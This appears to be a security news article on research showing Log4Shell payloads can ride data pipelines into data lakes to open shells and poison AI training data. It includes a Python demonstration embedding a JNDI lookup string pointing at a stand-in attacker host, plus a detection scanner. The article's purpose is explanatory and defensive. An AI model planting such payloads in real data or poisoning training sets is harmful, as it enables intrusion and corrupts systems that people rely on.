Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning — but unfortunately, researchers have found that these repositories are vulnerable to exploitation via the Java Log4Shell vulnerability.
In general, organizations focus on gathering as many data points as possible for training an AI model or algorithm, often with privacy in mind — but too often they overlook the security of the data lakes themselves.
According to research by Zectonal, the Log4Shell bug can be triggered once a malicious payload is ingested through a data pipeline into a target data lake or data repository, bypassing conventional protections such as application firewalls and traditional scanning devices.
As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string in a malicious big-data file payload to open a shell in the data lake, launching a data poisoning attack from there, researchers say. And since the big-data file carrying the toxic payload is often encrypted or compressed, it is much harder to detect.
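The detection problem the researchers describe can be sketched in a few lines: a Log4j-style lookup string hidden inside a gzip-compressed pipeline file is invisible to a scanner that inspects only the raw bytes, and only surfaces after decompression. The record contents and the attacker hostname below are illustrative placeholders, not taken from the Zectonal proof of concept.

```python
import gzip
import re

# Build a small newline-delimited JSON batch, as it might travel
# through a data pipeline. The sensor records and the hostname are
# illustrative placeholders.
records = [b'{"sensor": "weather-07", "temp": 20.5}'] * 20
records.append(
    b'{"sensor": "weather-07", "note": "${jndi:ldap://attacker.example/a}"}'
)
blob = gzip.compress(b"\n".join(records))

JNDI = re.compile(rb"\$\{jndi:")

# A scanner that inspects only the raw compressed bytes misses the
# lookup string; scanning after decompression finds it.
print(bool(JNDI.search(blob)))                    # False
print(bool(JNDI.search(gzip.decompress(blob))))   # True
```

The same blind spot applies to any content-based filter that never unpacks the file formats actually flowing through the pipeline.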
“The simplicity of the Log4Shell exploit is what makes it so nefarious,” said David Hirko, founder of Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it fits with the normal operations of data pipelines, big data distributed systems and machine learning training algorithms.”
Using RCE exploits to access data lakes
One way to carry out this attack is by targeting vulnerable versions of a no-code, open source extract-transform-load (ETL) software application, one of the most popular tools for filling data lakes. An attacker could access the ETL service running in a private subnet from the public Internet through a known remote code execution (RCE) exploit, researchers explain in the report.
The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector and successfully gained remote access to subnet IP addresses that belonged to a virtual private cloud hosted by a public cloud provider.
Although the ETL project patched the RCE issue last year, its components have been downloaded millions of times, and security teams have lagged behind in adopting the fix. The Zectonal team was successful in “triggering an RCE exploit for multiple unpatched releases of the ETL software spanning a period of two years,” according to the report, which was shared with Dark Reading ahead of publication.
“This attack vector is not as simple as sending a text string to a web server,” said Hirko, pointing out the need to penetrate the data supply chain. “An attacker would have to compromise a file somewhere upstream and then let it flow into the target data lake. Let’s say you’re considering weather data — you might be able to manipulate a weather sensor file so that it contained this particular string.”
Patches are available for this particular exploit and vulnerability, but there are likely many different ways to perform these types of Log4Shell attacks.
“There are probably many, many previously unknown or undisclosed vulnerabilities that enable the same thing,” Hirko says. “This is one of the first data poisoning-specific attack vectors we’ve seen, but we believe that data poisoning as a subset of AI poisoning will be one of the new attack vectors of the future.”
Real-world consequences
So far, Zectonal has not seen such attacks in the wild, but researchers hope the threat is on the radar screens of security teams. Such attacks may be rare, but they can have major consequences. For example, consider the case of autonomous vehicles, which rely on AI and sensors to navigate city streets.
“Car manufacturers train their AI to look at traffic lights, to know when to stop, slow down or go in the classic red, yellow, green format,” explains Hirko. “If you were to start poisoning the data lake that your AI was training on, it is possible to manipulate the AI software to behave in unforeseen ways. Perhaps your car is inadvertently being trained to go when the traffic light is red, and stop when it turns green. So that’s the type of attack vector that we suspect we’ll see in the future.”
Security protections lag behind
The risks are becoming more widely known among practitioners, Hirko tells Dark Reading — many of whom understand the danger but don’t know how to handle it. One challenge is that tackling the problem requires a new approach to security as well as new tools.
“We were able to send the poisoned payload through a fairly common data pipeline,” Hirko says. “Traditionally, these kinds of files and data pipelines don’t get through your standard front door set of firewalls. How data gets into the enterprise, how data gets into the data lake hasn’t really been part of the classic security posture of defense in depth or zero trust. If you’re using one of the major cloud providers, data coming in from an object storage bucket doesn’t necessarily pass through that firewall.”
He adds that the file formats in which these types of attacks can be bundled are relatively new and somewhat obscure — and because they are specific to the big data and AI worlds, they aren’t as easy to scan with typical security tools, which are created to scan documents or spreadsheets.
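As a rough illustration of what ingest-side scanning could look like, the sketch below walks a directory of incoming pipeline files, transparently decompresses gzip members, and flags files containing Log4j-style lookup strings before they reach the data lake. The function name and the detection pattern are illustrative assumptions, not a production scanner, and real tooling would also need to handle obfuscated lookups and formats such as Parquet or Avro.

```python
import gzip
import os
import re

# Pattern for plain Log4j lookup strings; real scanners would also
# cover obfuscated variants such as ${${lower:j}ndi:...}.
LOOKUP = re.compile(rb"\$\{[^}]*jndi[^}]*:")

def scan_ingest_dir(root):
    """Yield paths of incoming pipeline files that contain a lookup
    string, decompressing gzip members before inspection."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                data = f.read()
            if data[:2] == b"\x1f\x8b":        # gzip magic bytes
                try:
                    data = gzip.decompress(data)
                except OSError:
                    pass                        # truncated/corrupt member
            if LOOKUP.search(data):
                yield path
```

A hook like this would sit at the pipeline's ingest step, before files land in object storage, rather than at the network perimeter where such traffic is rarely inspected.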
So for their part, security vendors need to focus on developing different types of products to gain that additional visibility, he notes.
“Companies look at the quality of the data, components, individual data points — and it just makes sense to look at the security vulnerabilities of that data as well,” Hirko says. “We suspect that data observability will be built into both quality assurance and data security. This is an emerging type of data and AI security domain.”